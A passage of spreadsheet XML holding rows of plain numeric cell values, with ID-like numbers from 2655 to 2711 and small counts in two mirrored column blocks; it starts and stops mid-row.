      </c>
      <c r="K1006" s="7">
        <v>2655</v>
      </c>
      <c r="L1006" s="8">
        <v>24</v>
      </c>
      <c r="M1006" s="8">
        <v>1</v>
      </c>
      <c r="N1006" s="8">
        <v>0</v>
      </c>
      <c r="O1006" s="8">
        <v>0</v>
      </c>
      <c r="P1006" s="8">
        <v>20</v>
      </c>
      <c r="Q1006" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1007" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1007" s="7">
        <v>2656</v>
      </c>
      <c r="B1007" s="8">
        <v>26</v>
      </c>
      <c r="C1007" s="8">
        <v>1</v>
      </c>
      <c r="D1007" s="8">
        <v>23</v>
      </c>
      <c r="E1007" s="8">
        <v>39</v>
      </c>
      <c r="F1007" s="8">
        <v>3</v>
      </c>
      <c r="G1007" s="8">
        <v>6</v>
      </c>
      <c r="H1007" s="8">
        <v>98</v>
      </c>
      <c r="K1007" s="7">
        <v>2656</v>
      </c>
      <c r="L1007" s="8">
        <v>26</v>
      </c>
      <c r="M1007" s="8">
        <v>1</v>
      </c>
      <c r="N1007" s="8">
        <v>23</v>
      </c>
      <c r="O1007" s="8">
        <v>39</v>
      </c>
      <c r="P1007" s="8">
        <v>3</v>
      </c>
      <c r="Q1007" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1008" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1008" s="7">
        <v>2657</v>
      </c>
      <c r="B1008" s="8">
        <v>25</v>
      </c>
      <c r="C1008" s="8">
        <v>1</v>
      </c>
      <c r="D1008" s="8">
        <v>50</v>
      </c>
      <c r="E1008" s="8">
        <v>719</v>
      </c>
      <c r="F1008" s="8">
        <v>1</v>
      </c>
      <c r="G1008" s="8">
        <v>17</v>
      </c>
      <c r="H1008" s="8">
        <v>813</v>
      </c>
      <c r="K1008" s="7">
        <v>2657</v>
      </c>
      <c r="L1008" s="8">
        <v>25</v>
      </c>
      <c r="M1008" s="8">
        <v>1</v>
      </c>
      <c r="N1008" s="8">
        <v>50</v>
      </c>
      <c r="O1008" s="8">
        <v>719</v>
      </c>
      <c r="P1008" s="8">
        <v>1</v>
      </c>
      <c r="Q1008" s="8">
        <v>17</v>
      </c>
    </row>
    <row r="1009" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1009" s="7">
        <v>2658</v>
      </c>
      <c r="B1009" s="8">
        <v>30</v>
      </c>
      <c r="C1009" s="8">
        <v>0</v>
      </c>
      <c r="D1009" s="8">
        <v>0</v>
      </c>
      <c r="E1009" s="8">
        <v>0</v>
      </c>
      <c r="F1009" s="8">
        <v>6</v>
      </c>
      <c r="G1009" s="8">
        <v>3</v>
      </c>
      <c r="H1009" s="8">
        <v>39</v>
      </c>
      <c r="K1009" s="7">
        <v>2658</v>
      </c>
      <c r="L1009" s="8">
        <v>30</v>
      </c>
      <c r="M1009" s="8">
        <v>0</v>
      </c>
      <c r="N1009" s="8">
        <v>0</v>
      </c>
      <c r="O1009" s="8">
        <v>0</v>
      </c>
      <c r="P1009" s="8">
        <v>6</v>
      </c>
      <c r="Q1009" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1010" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1010" s="7">
        <v>2659</v>
      </c>
      <c r="B1010" s="8">
        <v>30</v>
      </c>
      <c r="C1010" s="8">
        <v>0</v>
      </c>
      <c r="D1010" s="8">
        <v>2</v>
      </c>
      <c r="E1010" s="8">
        <v>0</v>
      </c>
      <c r="F1010" s="8">
        <v>12</v>
      </c>
      <c r="G1010" s="8">
        <v>0</v>
      </c>
      <c r="H1010" s="8">
        <v>44</v>
      </c>
      <c r="K1010" s="7">
        <v>2659</v>
      </c>
      <c r="L1010" s="8">
        <v>30</v>
      </c>
      <c r="M1010" s="8">
        <v>0</v>
      </c>
      <c r="N1010" s="8">
        <v>2</v>
      </c>
      <c r="O1010" s="8">
        <v>0</v>
      </c>
      <c r="P1010" s="8">
        <v>12</v>
      </c>
      <c r="Q1010" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1011" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1011" s="7">
        <v>2660</v>
      </c>
      <c r="B1011" s="8">
        <v>26</v>
      </c>
      <c r="C1011" s="8">
        <v>0</v>
      </c>
      <c r="D1011" s="8">
        <v>2</v>
      </c>
      <c r="E1011" s="8">
        <v>3</v>
      </c>
      <c r="F1011" s="8">
        <v>0</v>
      </c>
      <c r="G1011" s="8">
        <v>1</v>
      </c>
      <c r="H1011" s="8">
        <v>32</v>
      </c>
      <c r="K1011" s="7">
        <v>2660</v>
      </c>
      <c r="L1011" s="8">
        <v>26</v>
      </c>
      <c r="M1011" s="8">
        <v>0</v>
      </c>
      <c r="N1011" s="8">
        <v>2</v>
      </c>
      <c r="O1011" s="8">
        <v>3</v>
      </c>
      <c r="P1011" s="8">
        <v>0</v>
      </c>
      <c r="Q1011" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1012" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1012" s="7">
        <v>2661</v>
      </c>
      <c r="B1012" s="8">
        <v>13</v>
      </c>
      <c r="C1012" s="8">
        <v>3</v>
      </c>
      <c r="D1012" s="8">
        <v>76</v>
      </c>
      <c r="E1012" s="8">
        <v>11</v>
      </c>
      <c r="F1012" s="8">
        <v>1</v>
      </c>
      <c r="G1012" s="8">
        <v>0</v>
      </c>
      <c r="H1012" s="8">
        <v>104</v>
      </c>
      <c r="K1012" s="7">
        <v>2661</v>
      </c>
      <c r="L1012" s="8">
        <v>13</v>
      </c>
      <c r="M1012" s="8">
        <v>3</v>
      </c>
      <c r="N1012" s="8">
        <v>76</v>
      </c>
      <c r="O1012" s="8">
        <v>11</v>
      </c>
      <c r="P1012" s="8">
        <v>1</v>
      </c>
      <c r="Q1012" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1013" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1013" s="7">
        <v>2667</v>
      </c>
      <c r="B1013" s="8">
        <v>25</v>
      </c>
      <c r="C1013" s="8">
        <v>3</v>
      </c>
      <c r="D1013" s="8">
        <v>10</v>
      </c>
      <c r="E1013" s="8">
        <v>202</v>
      </c>
      <c r="F1013" s="8">
        <v>26</v>
      </c>
      <c r="G1013" s="8">
        <v>33</v>
      </c>
      <c r="H1013" s="8">
        <v>299</v>
      </c>
      <c r="K1013" s="7">
        <v>2667</v>
      </c>
      <c r="L1013" s="8">
        <v>25</v>
      </c>
      <c r="M1013" s="8">
        <v>3</v>
      </c>
      <c r="N1013" s="8">
        <v>10</v>
      </c>
      <c r="O1013" s="8">
        <v>202</v>
      </c>
      <c r="P1013" s="8">
        <v>26</v>
      </c>
      <c r="Q1013" s="8">
        <v>33</v>
      </c>
    </row>
    <row r="1014" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1014" s="7">
        <v>2669</v>
      </c>
      <c r="B1014" s="8">
        <v>26</v>
      </c>
      <c r="C1014" s="8">
        <v>1</v>
      </c>
      <c r="D1014" s="8">
        <v>36</v>
      </c>
      <c r="E1014" s="8">
        <v>35</v>
      </c>
      <c r="F1014" s="8">
        <v>30</v>
      </c>
      <c r="G1014" s="8">
        <v>37</v>
      </c>
      <c r="H1014" s="8">
        <v>165</v>
      </c>
      <c r="K1014" s="7">
        <v>2669</v>
      </c>
      <c r="L1014" s="8">
        <v>26</v>
      </c>
      <c r="M1014" s="8">
        <v>1</v>
      </c>
      <c r="N1014" s="8">
        <v>36</v>
      </c>
      <c r="O1014" s="8">
        <v>35</v>
      </c>
      <c r="P1014" s="8">
        <v>30</v>
      </c>
      <c r="Q1014" s="8">
        <v>37</v>
      </c>
    </row>
    <row r="1015" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1015" s="7">
        <v>2670</v>
      </c>
      <c r="B1015" s="8">
        <v>0</v>
      </c>
      <c r="C1015" s="8">
        <v>0</v>
      </c>
      <c r="D1015" s="8">
        <v>4</v>
      </c>
      <c r="E1015" s="8">
        <v>0</v>
      </c>
      <c r="F1015" s="8">
        <v>2</v>
      </c>
      <c r="G1015" s="8">
        <v>3</v>
      </c>
      <c r="H1015" s="8">
        <v>9</v>
      </c>
      <c r="K1015" s="7">
        <v>2670</v>
      </c>
      <c r="L1015" s="8">
        <v>0</v>
      </c>
      <c r="M1015" s="8">
        <v>0</v>
      </c>
      <c r="N1015" s="8">
        <v>4</v>
      </c>
      <c r="O1015" s="8">
        <v>0</v>
      </c>
      <c r="P1015" s="8">
        <v>2</v>
      </c>
      <c r="Q1015" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1016" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1016" s="7">
        <v>2671</v>
      </c>
      <c r="B1016" s="8">
        <v>26</v>
      </c>
      <c r="C1016" s="8">
        <v>2</v>
      </c>
      <c r="D1016" s="8">
        <v>2</v>
      </c>
      <c r="E1016" s="8">
        <v>0</v>
      </c>
      <c r="F1016" s="8">
        <v>2</v>
      </c>
      <c r="G1016" s="8">
        <v>2</v>
      </c>
      <c r="H1016" s="8">
        <v>34</v>
      </c>
      <c r="K1016" s="7">
        <v>2671</v>
      </c>
      <c r="L1016" s="8">
        <v>26</v>
      </c>
      <c r="M1016" s="8">
        <v>2</v>
      </c>
      <c r="N1016" s="8">
        <v>2</v>
      </c>
      <c r="O1016" s="8">
        <v>0</v>
      </c>
      <c r="P1016" s="8">
        <v>2</v>
      </c>
      <c r="Q1016" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1017" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1017" s="7">
        <v>2674</v>
      </c>
      <c r="B1017" s="8">
        <v>25</v>
      </c>
      <c r="C1017" s="8">
        <v>1</v>
      </c>
      <c r="D1017" s="8">
        <v>4</v>
      </c>
      <c r="E1017" s="8">
        <v>0</v>
      </c>
      <c r="F1017" s="8">
        <v>6</v>
      </c>
      <c r="G1017" s="8">
        <v>1</v>
      </c>
      <c r="H1017" s="8">
        <v>37</v>
      </c>
      <c r="K1017" s="7">
        <v>2674</v>
      </c>
      <c r="L1017" s="8">
        <v>25</v>
      </c>
      <c r="M1017" s="8">
        <v>1</v>
      </c>
      <c r="N1017" s="8">
        <v>4</v>
      </c>
      <c r="O1017" s="8">
        <v>0</v>
      </c>
      <c r="P1017" s="8">
        <v>6</v>
      </c>
      <c r="Q1017" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1018" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1018" s="7">
        <v>2675</v>
      </c>
      <c r="B1018" s="8">
        <v>26</v>
      </c>
      <c r="C1018" s="8">
        <v>0</v>
      </c>
      <c r="D1018" s="8">
        <v>3</v>
      </c>
      <c r="E1018" s="8">
        <v>7</v>
      </c>
      <c r="F1018" s="8">
        <v>2</v>
      </c>
      <c r="G1018" s="8">
        <v>3</v>
      </c>
      <c r="H1018" s="8">
        <v>41</v>
      </c>
      <c r="K1018" s="7">
        <v>2675</v>
      </c>
      <c r="L1018" s="8">
        <v>26</v>
      </c>
      <c r="M1018" s="8">
        <v>0</v>
      </c>
      <c r="N1018" s="8">
        <v>3</v>
      </c>
      <c r="O1018" s="8">
        <v>7</v>
      </c>
      <c r="P1018" s="8">
        <v>2</v>
      </c>
      <c r="Q1018" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1019" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1019" s="7">
        <v>2676</v>
      </c>
      <c r="B1019" s="8">
        <v>0</v>
      </c>
      <c r="C1019" s="8">
        <v>0</v>
      </c>
      <c r="D1019" s="8">
        <v>0</v>
      </c>
      <c r="E1019" s="8">
        <v>0</v>
      </c>
      <c r="F1019" s="8">
        <v>35</v>
      </c>
      <c r="G1019" s="8">
        <v>28</v>
      </c>
      <c r="H1019" s="8">
        <v>63</v>
      </c>
      <c r="K1019" s="7">
        <v>2676</v>
      </c>
      <c r="L1019" s="8">
        <v>0</v>
      </c>
      <c r="M1019" s="8">
        <v>0</v>
      </c>
      <c r="N1019" s="8">
        <v>0</v>
      </c>
      <c r="O1019" s="8">
        <v>0</v>
      </c>
      <c r="P1019" s="8">
        <v>35</v>
      </c>
      <c r="Q1019" s="8">
        <v>28</v>
      </c>
    </row>
    <row r="1020" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1020" s="7">
        <v>2677</v>
      </c>
      <c r="B1020" s="8">
        <v>26</v>
      </c>
      <c r="C1020" s="8">
        <v>1</v>
      </c>
      <c r="D1020" s="8">
        <v>1</v>
      </c>
      <c r="E1020" s="8">
        <v>0</v>
      </c>
      <c r="F1020" s="8">
        <v>8</v>
      </c>
      <c r="G1020" s="8">
        <v>4</v>
      </c>
      <c r="H1020" s="8">
        <v>40</v>
      </c>
      <c r="K1020" s="7">
        <v>2677</v>
      </c>
      <c r="L1020" s="8">
        <v>26</v>
      </c>
      <c r="M1020" s="8">
        <v>1</v>
      </c>
      <c r="N1020" s="8">
        <v>1</v>
      </c>
      <c r="O1020" s="8">
        <v>0</v>
      </c>
      <c r="P1020" s="8">
        <v>8</v>
      </c>
      <c r="Q1020" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1021" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1021" s="7">
        <v>2685</v>
      </c>
      <c r="B1021" s="8">
        <v>0</v>
      </c>
      <c r="C1021" s="8">
        <v>0</v>
      </c>
      <c r="D1021" s="8">
        <v>0</v>
      </c>
      <c r="E1021" s="8">
        <v>0</v>
      </c>
      <c r="F1021" s="8">
        <v>8</v>
      </c>
      <c r="G1021" s="8">
        <v>9</v>
      </c>
      <c r="H1021" s="8">
        <v>17</v>
      </c>
      <c r="K1021" s="7">
        <v>2685</v>
      </c>
      <c r="L1021" s="8">
        <v>0</v>
      </c>
      <c r="M1021" s="8">
        <v>0</v>
      </c>
      <c r="N1021" s="8">
        <v>0</v>
      </c>
      <c r="O1021" s="8">
        <v>0</v>
      </c>
      <c r="P1021" s="8">
        <v>8</v>
      </c>
      <c r="Q1021" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="1022" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1022" s="7">
        <v>2686</v>
      </c>
      <c r="B1022" s="8">
        <v>6</v>
      </c>
      <c r="C1022" s="8">
        <v>2</v>
      </c>
      <c r="D1022" s="8">
        <v>45</v>
      </c>
      <c r="E1022" s="8">
        <v>7</v>
      </c>
      <c r="F1022" s="8">
        <v>5</v>
      </c>
      <c r="G1022" s="8">
        <v>3</v>
      </c>
      <c r="H1022" s="8">
        <v>68</v>
      </c>
      <c r="K1022" s="7">
        <v>2686</v>
      </c>
      <c r="L1022" s="8">
        <v>6</v>
      </c>
      <c r="M1022" s="8">
        <v>2</v>
      </c>
      <c r="N1022" s="8">
        <v>45</v>
      </c>
      <c r="O1022" s="8">
        <v>7</v>
      </c>
      <c r="P1022" s="8">
        <v>5</v>
      </c>
      <c r="Q1022" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1023" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1023" s="7">
        <v>2687</v>
      </c>
      <c r="B1023" s="8">
        <v>25</v>
      </c>
      <c r="C1023" s="8">
        <v>1</v>
      </c>
      <c r="D1023" s="8">
        <v>2</v>
      </c>
      <c r="E1023" s="8">
        <v>3</v>
      </c>
      <c r="F1023" s="8">
        <v>2</v>
      </c>
      <c r="G1023" s="8">
        <v>0</v>
      </c>
      <c r="H1023" s="8">
        <v>33</v>
      </c>
      <c r="K1023" s="7">
        <v>2687</v>
      </c>
      <c r="L1023" s="8">
        <v>25</v>
      </c>
      <c r="M1023" s="8">
        <v>1</v>
      </c>
      <c r="N1023" s="8">
        <v>2</v>
      </c>
      <c r="O1023" s="8">
        <v>3</v>
      </c>
      <c r="P1023" s="8">
        <v>2</v>
      </c>
      <c r="Q1023" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1024" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1024" s="7">
        <v>2688</v>
      </c>
      <c r="B1024" s="8">
        <v>25</v>
      </c>
      <c r="C1024" s="8">
        <v>1</v>
      </c>
      <c r="D1024" s="8">
        <v>5</v>
      </c>
      <c r="E1024" s="8">
        <v>3</v>
      </c>
      <c r="F1024" s="8">
        <v>0</v>
      </c>
      <c r="G1024" s="8">
        <v>2</v>
      </c>
      <c r="H1024" s="8">
        <v>36</v>
      </c>
      <c r="K1024" s="7">
        <v>2688</v>
      </c>
      <c r="L1024" s="8">
        <v>25</v>
      </c>
      <c r="M1024" s="8">
        <v>1</v>
      </c>
      <c r="N1024" s="8">
        <v>5</v>
      </c>
      <c r="O1024" s="8">
        <v>3</v>
      </c>
      <c r="P1024" s="8">
        <v>0</v>
      </c>
      <c r="Q1024" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1025" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1025" s="7">
        <v>2689</v>
      </c>
      <c r="B1025" s="8">
        <v>26</v>
      </c>
      <c r="C1025" s="8">
        <v>0</v>
      </c>
      <c r="D1025" s="8">
        <v>0</v>
      </c>
      <c r="E1025" s="8">
        <v>0</v>
      </c>
      <c r="F1025" s="8">
        <v>6</v>
      </c>
      <c r="G1025" s="8">
        <v>0</v>
      </c>
      <c r="H1025" s="8">
        <v>32</v>
      </c>
      <c r="K1025" s="7">
        <v>2689</v>
      </c>
      <c r="L1025" s="8">
        <v>26</v>
      </c>
      <c r="M1025" s="8">
        <v>0</v>
      </c>
      <c r="N1025" s="8">
        <v>0</v>
      </c>
      <c r="O1025" s="8">
        <v>0</v>
      </c>
      <c r="P1025" s="8">
        <v>6</v>
      </c>
      <c r="Q1025" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1026" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1026" s="7">
        <v>2690</v>
      </c>
      <c r="B1026" s="8">
        <v>7</v>
      </c>
      <c r="C1026" s="8">
        <v>1</v>
      </c>
      <c r="D1026" s="8">
        <v>0</v>
      </c>
      <c r="E1026" s="8">
        <v>0</v>
      </c>
      <c r="F1026" s="8">
        <v>12</v>
      </c>
      <c r="G1026" s="8">
        <v>1</v>
      </c>
      <c r="H1026" s="8">
        <v>21</v>
      </c>
      <c r="K1026" s="7">
        <v>2690</v>
      </c>
      <c r="L1026" s="8">
        <v>7</v>
      </c>
      <c r="M1026" s="8">
        <v>1</v>
      </c>
      <c r="N1026" s="8">
        <v>0</v>
      </c>
      <c r="O1026" s="8">
        <v>0</v>
      </c>
      <c r="P1026" s="8">
        <v>12</v>
      </c>
      <c r="Q1026" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1027" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1027" s="7">
        <v>2692</v>
      </c>
      <c r="B1027" s="8">
        <v>26</v>
      </c>
      <c r="C1027" s="8">
        <v>0</v>
      </c>
      <c r="D1027" s="8">
        <v>4</v>
      </c>
      <c r="E1027" s="8">
        <v>8</v>
      </c>
      <c r="F1027" s="8">
        <v>0</v>
      </c>
      <c r="G1027" s="8">
        <v>0</v>
      </c>
      <c r="H1027" s="8">
        <v>38</v>
      </c>
      <c r="K1027" s="7">
        <v>2692</v>
      </c>
      <c r="L1027" s="8">
        <v>26</v>
      </c>
      <c r="M1027" s="8">
        <v>0</v>
      </c>
      <c r="N1027" s="8">
        <v>4</v>
      </c>
      <c r="O1027" s="8">
        <v>8</v>
      </c>
      <c r="P1027" s="8">
        <v>0</v>
      </c>
      <c r="Q1027" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1028" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1028" s="7">
        <v>2693</v>
      </c>
      <c r="B1028" s="8">
        <v>26</v>
      </c>
      <c r="C1028" s="8">
        <v>1</v>
      </c>
      <c r="D1028" s="8">
        <v>0</v>
      </c>
      <c r="E1028" s="8">
        <v>0</v>
      </c>
      <c r="F1028" s="8">
        <v>18</v>
      </c>
      <c r="G1028" s="8">
        <v>4</v>
      </c>
      <c r="H1028" s="8">
        <v>49</v>
      </c>
      <c r="K1028" s="7">
        <v>2693</v>
      </c>
      <c r="L1028" s="8">
        <v>26</v>
      </c>
      <c r="M1028" s="8">
        <v>1</v>
      </c>
      <c r="N1028" s="8">
        <v>0</v>
      </c>
      <c r="O1028" s="8">
        <v>0</v>
      </c>
      <c r="P1028" s="8">
        <v>18</v>
      </c>
      <c r="Q1028" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1029" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1029" s="7">
        <v>2695</v>
      </c>
      <c r="B1029" s="8">
        <v>26</v>
      </c>
      <c r="C1029" s="8">
        <v>0</v>
      </c>
      <c r="D1029" s="8">
        <v>0</v>
      </c>
      <c r="E1029" s="8">
        <v>0</v>
      </c>
      <c r="F1029" s="8">
        <v>6</v>
      </c>
      <c r="G1029" s="8">
        <v>1</v>
      </c>
      <c r="H1029" s="8">
        <v>33</v>
      </c>
      <c r="K1029" s="7">
        <v>2695</v>
      </c>
      <c r="L1029" s="8">
        <v>26</v>
      </c>
      <c r="M1029" s="8">
        <v>0</v>
      </c>
      <c r="N1029" s="8">
        <v>0</v>
      </c>
      <c r="O1029" s="8">
        <v>0</v>
      </c>
      <c r="P1029" s="8">
        <v>6</v>
      </c>
      <c r="Q1029" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1030" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1030" s="7">
        <v>2698</v>
      </c>
      <c r="B1030" s="8">
        <v>5</v>
      </c>
      <c r="C1030" s="8">
        <v>1</v>
      </c>
      <c r="D1030" s="8">
        <v>50</v>
      </c>
      <c r="E1030" s="8">
        <v>18</v>
      </c>
      <c r="F1030" s="8">
        <v>25</v>
      </c>
      <c r="G1030" s="8">
        <v>105</v>
      </c>
      <c r="H1030" s="8">
        <v>204</v>
      </c>
      <c r="K1030" s="7">
        <v>2698</v>
      </c>
      <c r="L1030" s="8">
        <v>5</v>
      </c>
      <c r="M1030" s="8">
        <v>1</v>
      </c>
      <c r="N1030" s="8">
        <v>50</v>
      </c>
      <c r="O1030" s="8">
        <v>18</v>
      </c>
      <c r="P1030" s="8">
        <v>25</v>
      </c>
      <c r="Q1030" s="8">
        <v>105</v>
      </c>
    </row>
    <row r="1031" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1031" s="7">
        <v>2700</v>
      </c>
      <c r="B1031" s="8">
        <v>30</v>
      </c>
      <c r="C1031" s="8">
        <v>0</v>
      </c>
      <c r="D1031" s="8">
        <v>0</v>
      </c>
      <c r="E1031" s="8">
        <v>0</v>
      </c>
      <c r="F1031" s="8">
        <v>7</v>
      </c>
      <c r="G1031" s="8">
        <v>1</v>
      </c>
      <c r="H1031" s="8">
        <v>38</v>
      </c>
      <c r="K1031" s="7">
        <v>2700</v>
      </c>
      <c r="L1031" s="8">
        <v>30</v>
      </c>
      <c r="M1031" s="8">
        <v>0</v>
      </c>
      <c r="N1031" s="8">
        <v>0</v>
      </c>
      <c r="O1031" s="8">
        <v>0</v>
      </c>
      <c r="P1031" s="8">
        <v>7</v>
      </c>
      <c r="Q1031" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1032" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1032" s="7">
        <v>2701</v>
      </c>
      <c r="B1032" s="8">
        <v>6</v>
      </c>
      <c r="C1032" s="8">
        <v>1</v>
      </c>
      <c r="D1032" s="8">
        <v>10</v>
      </c>
      <c r="E1032" s="8">
        <v>0</v>
      </c>
      <c r="F1032" s="8">
        <v>22</v>
      </c>
      <c r="G1032" s="8">
        <v>11</v>
      </c>
      <c r="H1032" s="8">
        <v>50</v>
      </c>
      <c r="K1032" s="7">
        <v>2701</v>
      </c>
      <c r="L1032" s="8">
        <v>6</v>
      </c>
      <c r="M1032" s="8">
        <v>1</v>
      </c>
      <c r="N1032" s="8">
        <v>10</v>
      </c>
      <c r="O1032" s="8">
        <v>0</v>
      </c>
      <c r="P1032" s="8">
        <v>22</v>
      </c>
      <c r="Q1032" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="1033" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1033" s="7">
        <v>2702</v>
      </c>
      <c r="B1033" s="8">
        <v>6</v>
      </c>
      <c r="C1033" s="8">
        <v>1</v>
      </c>
      <c r="D1033" s="8">
        <v>0</v>
      </c>
      <c r="E1033" s="8">
        <v>0</v>
      </c>
      <c r="F1033" s="8">
        <v>1</v>
      </c>
      <c r="G1033" s="8">
        <v>1</v>
      </c>
      <c r="H1033" s="8">
        <v>9</v>
      </c>
      <c r="K1033" s="7">
        <v>2702</v>
      </c>
      <c r="L1033" s="8">
        <v>6</v>
      </c>
      <c r="M1033" s="8">
        <v>1</v>
      </c>
      <c r="N1033" s="8">
        <v>0</v>
      </c>
      <c r="O1033" s="8">
        <v>0</v>
      </c>
      <c r="P1033" s="8">
        <v>1</v>
      </c>
      <c r="Q1033" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1034" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1034" s="7">
        <v>2703</v>
      </c>
      <c r="B1034" s="8">
        <v>7</v>
      </c>
      <c r="C1034" s="8">
        <v>0</v>
      </c>
      <c r="D1034" s="8">
        <v>5</v>
      </c>
      <c r="E1034" s="8">
        <v>0</v>
      </c>
      <c r="F1034" s="8">
        <v>6</v>
      </c>
      <c r="G1034" s="8">
        <v>1</v>
      </c>
      <c r="H1034" s="8">
        <v>19</v>
      </c>
      <c r="K1034" s="7">
        <v>2703</v>
      </c>
      <c r="L1034" s="8">
        <v>7</v>
      </c>
      <c r="M1034" s="8">
        <v>0</v>
      </c>
      <c r="N1034" s="8">
        <v>5</v>
      </c>
      <c r="O1034" s="8">
        <v>0</v>
      </c>
      <c r="P1034" s="8">
        <v>6</v>
      </c>
      <c r="Q1034" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1035" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1035" s="7">
        <v>2704</v>
      </c>
      <c r="B1035" s="8">
        <v>25</v>
      </c>
      <c r="C1035" s="8">
        <v>1</v>
      </c>
      <c r="D1035" s="8">
        <v>13</v>
      </c>
      <c r="E1035" s="8">
        <v>67</v>
      </c>
      <c r="F1035" s="8">
        <v>9</v>
      </c>
      <c r="G1035" s="8">
        <v>7</v>
      </c>
      <c r="H1035" s="8">
        <v>122</v>
      </c>
      <c r="K1035" s="7">
        <v>2704</v>
      </c>
      <c r="L1035" s="8">
        <v>25</v>
      </c>
      <c r="M1035" s="8">
        <v>1</v>
      </c>
      <c r="N1035" s="8">
        <v>13</v>
      </c>
      <c r="O1035" s="8">
        <v>67</v>
      </c>
      <c r="P1035" s="8">
        <v>9</v>
      </c>
      <c r="Q1035" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="1036" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1036" s="7">
        <v>2705</v>
      </c>
      <c r="B1036" s="8">
        <v>25</v>
      </c>
      <c r="C1036" s="8">
        <v>1</v>
      </c>
      <c r="D1036" s="8">
        <v>13</v>
      </c>
      <c r="E1036" s="8">
        <v>67</v>
      </c>
      <c r="F1036" s="8">
        <v>4</v>
      </c>
      <c r="G1036" s="8">
        <v>5</v>
      </c>
      <c r="H1036" s="8">
        <v>115</v>
      </c>
      <c r="K1036" s="7">
        <v>2705</v>
      </c>
      <c r="L1036" s="8">
        <v>25</v>
      </c>
      <c r="M1036" s="8">
        <v>1</v>
      </c>
      <c r="N1036" s="8">
        <v>13</v>
      </c>
      <c r="O1036" s="8">
        <v>67</v>
      </c>
      <c r="P1036" s="8">
        <v>4</v>
      </c>
      <c r="Q1036" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1037" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1037" s="7">
        <v>2706</v>
      </c>
      <c r="B1037" s="8">
        <v>5</v>
      </c>
      <c r="C1037" s="8">
        <v>3</v>
      </c>
      <c r="D1037" s="8">
        <v>0</v>
      </c>
      <c r="E1037" s="8">
        <v>0</v>
      </c>
      <c r="F1037" s="8">
        <v>37</v>
      </c>
      <c r="G1037" s="8">
        <v>11</v>
      </c>
      <c r="H1037" s="8">
        <v>56</v>
      </c>
      <c r="K1037" s="7">
        <v>2706</v>
      </c>
      <c r="L1037" s="8">
        <v>5</v>
      </c>
      <c r="M1037" s="8">
        <v>3</v>
      </c>
      <c r="N1037" s="8">
        <v>0</v>
      </c>
      <c r="O1037" s="8">
        <v>0</v>
      </c>
      <c r="P1037" s="8">
        <v>37</v>
      </c>
      <c r="Q1037" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="1038" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1038" s="7">
        <v>2710</v>
      </c>
      <c r="B1038" s="8">
        <v>25</v>
      </c>
      <c r="C1038" s="8">
        <v>1</v>
      </c>
      <c r="D1038" s="8">
        <v>5</v>
      </c>
      <c r="E1038" s="8">
        <v>2</v>
      </c>
      <c r="F1038" s="8">
        <v>4</v>
      </c>
      <c r="G1038" s="8">
        <v>3</v>
      </c>
      <c r="H1038" s="8">
        <v>40</v>
      </c>
      <c r="K1038" s="7">
        <v>2710</v>
      </c>
      <c r="L1038" s="8">
        <v>25</v>
      </c>
      <c r="M1038" s="8">
        <v>1</v>
      </c>
      <c r="N1038" s="8">
        <v>5</v>
      </c>
      <c r="O1038" s="8">
        <v>2</v>
      </c>
      <c r="P1038" s="8">
        <v>4</v>
      </c>
      <c r="Q1038" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1039" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1039" s="7">
        <v>2711</v>
      </c>
      <c r="B1039" s="8">
        <v>25</v>
      </c>
      <c r="C1039" s="8">
